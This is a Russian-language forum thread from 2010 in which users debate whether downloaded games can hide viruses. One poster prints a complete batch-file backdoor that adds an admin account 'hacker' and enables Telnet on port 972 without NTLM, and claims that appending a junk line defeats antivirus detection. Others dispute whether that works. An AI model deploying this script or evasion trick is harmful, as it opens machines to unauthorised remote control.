Форум Oni

demos_kratos написал(а):

Или ты думаешь все 600 и более человек, скачавших <что-либо>, слепые и не заметили вируса?

Я сейчас провел эксперимент. Взял bat троянчика, проверил антивирусами - написали "Заражен". Написал я в конце bat файла на новой строчке аброкадабру. Все антивирусы написали "Не заражен". Запустил я троянчик с аброкадаброй в админе. Он сделал все свои грязные дела, обойдя антивирусы! Таким образом троянчик может обмануть всех 600 и более человек!
В трекере скорость низкая, а в локалке -высокая!
С ограниченными правами троянчик ничего не сломал!
Пароли надо держать в запароленном rar архиве, а не в открытую!!

Отредактировал(а) Manticore (08-06-2010 20:02:57)

Вирус могут не найти, особенно если новый, и активироваться он может через 2 недели после запуска игры. Выложили игру, вроде не зараженная, а потом через 2 недели хоп - и компы сломались. И непонятно где заразился.

Вот троян, тело bat файла:

chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet

Антивирусы сразу кричат что опасен
Теперь напишем так

chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
sdbhubvgsrhbghs

Троян остался таким же работоспосбным и опасным, но из-за "sdbhubvgsrhbghs" антивирусы пишут "Не заражен" и никак не блокируют угрозу! Вот так на раздаче можно обмануть антивирусы!

P.S. Если надумаете его попробовать, удалите жало
net user SUPPORT_388945a0 /delete
net localgroup Пользователи SUPPORT_388945a0 /del

Отредактировал(а) Manticore (09-06-2010 06:43:12)

Блэцк, ты говорил у тебя Касперский? Проверь в госте, обманет ли его "sdbhubvgsrhbghs" ?

Manticore написал(а):

антивирусы пишут "Не заражен"

ЧЯДНТ?

Ну и что? Молчит мой антивирус без "sdbhubvgsrhbghs" . И с "sdbhubvgsrhbghs"  молчит

Мой Аваст не молчит. Ты нажал "сканировать файл"? Значит его нет в антивирусной базе Касперского . Аваст выиграл .

В txt я сказал переименовать, чтоб он тебе ничено не попортил. Он легко может стать bat файлом, и тогда будет опасен. На txt аваст пишет "Обнаружена угроза".
Антивирус запрещает выполнять действия. И ограничения прав тоже запрещают. В чем разница? Оба запрещают.

Отредактировал(а) Manticore (09-06-2010 07:29:38)

Ну если что-то серьезное будет то я возьму диск на котором написано "Windows7" и переустановлю ОС с форматом жесткого диска

Добавлено спустя 54 секунды:
О да. Линукс тоже выход

demos_kratos написал(а):

Мант, ты, как вирусофоб, просто обязан перейти на линукс. =3

судя по обсуждению работы с админскими правами и bat-вирусов, дело будет длиться до первого перлового однострочника. %)

Мih@ написал(а):

дело будет длиться до первого перлового однострочника.

Так это не вирус. Это патч =3